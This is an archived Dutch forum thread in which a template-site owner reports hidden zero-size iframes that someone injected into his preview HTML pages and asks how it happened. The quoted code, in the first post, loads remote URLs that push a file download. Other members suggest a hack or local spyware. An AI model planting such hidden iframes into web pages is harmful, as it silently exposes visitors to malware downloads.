Archief - HTML/PHP/FTP: geen idee

Het archief is een bevroren moment uit een vorige versie van dit forum, met andere regels en andere bazen. Deze posts weerspiegelen op geen enkele manier onze huidige ideeën, waarden of wereldbeelden en zijn op sommige plaatsen gecensureerd wegens ontoelaatbaar. Veel zijn in een andere tijdsgeest gemaakt, al dan niet ironisch - zoals in het ironische subforum Off-Topic - en zouden op dit moment niet meer gepost (mogen) worden. Toch bieden we dit archief nog graag aan als informatiedatabank en naslagwerk. Lees er hier meer over of start een gesprek met anderen.
0

0n3Liner

Legacy Member
Code: 
``<IFRAME SRC=http://www.crazy-toolbar.com/home/Volume/ WIDTH=0 BORDER=0 HEIGHT=0></IFRAME><iframe src=http://195.95.218.173/dl/adv433.php width=1 height=1></iframe>````<IFRAME SRC=http://www.crazy-toolbar.com/home/Volume/ WIDTH=0 BORDER=0 HEIGHT=0></IFRAME><iframe src=http://195.95.218.173/dl/adv433.php width=1 height=1></iframe><iframe src=http://ambush-script.com/ld/iframe.php?acc=snake style=display:none></iframe><iframe src=http://toolbarpartner.com/in.php?wm=Volume width=0 height=0></iframe>``

De bovenstaande code is op een duistere manier vanonder aan enkele van mijn templates verschenen op clantemplatehq. De code zorgt ervoor dat je een .pl begint te downloaden, allez, het vraagt om dit te downloaden.

Ik heb geen idee hoe dit komt vermits ik alleen toegang heb tot de FTP.
Ook is er de vorige week door niemand van het team een template ge-upload dus daardoor kan het ook niet komen. Ik heb geen flauw maar dan ook geen flauw idee vanwaar dit komt.
Z

Zero Grav

Legacy Member
Seems you've been hacked?
Misschien eens proberen om een back-up te plaatsen?
D

DarkBone

Legacy Member
Ziet iedereen dat?
Kun je een voorbeeld van een pagina geven waar dit voorkomt?

Waar ik op doel is dat het misschien enkel bij jou in jou browser zo is, en dan denk ik aan spyware/adware die zich ergens op je systeem genesteld heeft. 't Is maar een gedacht natuurlijk :)
0

0n3Liner

Legacy Member
ik kreeg vandaag de report binnen, iedereen ziet het. bijna al mijn template previews zijn geinfecteerd.

http://preview.clantemplatehq.com/ Crack2/

*edit wel ff bijzeggen: alleen de html files worden geinfecteerd en ook niet allemaal. niet heel de website is geinfecteerd, blijkbaar ook alleen maar de preview dir.... hopelijk blijft dit zo...
0

0n3Liner

Legacy Member
ze vroegen juist om een voorbeeld te geven, dus laat ik die even staan...
heb trouwens de file al gedownload, en geopend...zit niets in buiten een base64 encode string... wanneer gedecode komt er ook niet veel uit...
Het archief is een bevroren moment uit een vorige versie van dit forum, met andere regels en andere bazen. Deze posts weerspiegelen op geen enkele manier onze huidige ideeën, waarden of wereldbeelden en zijn op sommige plaatsen gecensureerd wegens ontoelaatbaar. Veel zijn in een andere tijdsgeest gemaakt, al dan niet ironisch - zoals in het ironische subforum Off-Topic - en zouden op dit moment niet meer gepost (mogen) worden. Toch bieden we dit archief nog graag aan als informatiedatabank en naslagwerk. Lees er hier meer over of start een gesprek met anderen.
Terug
Bovenaan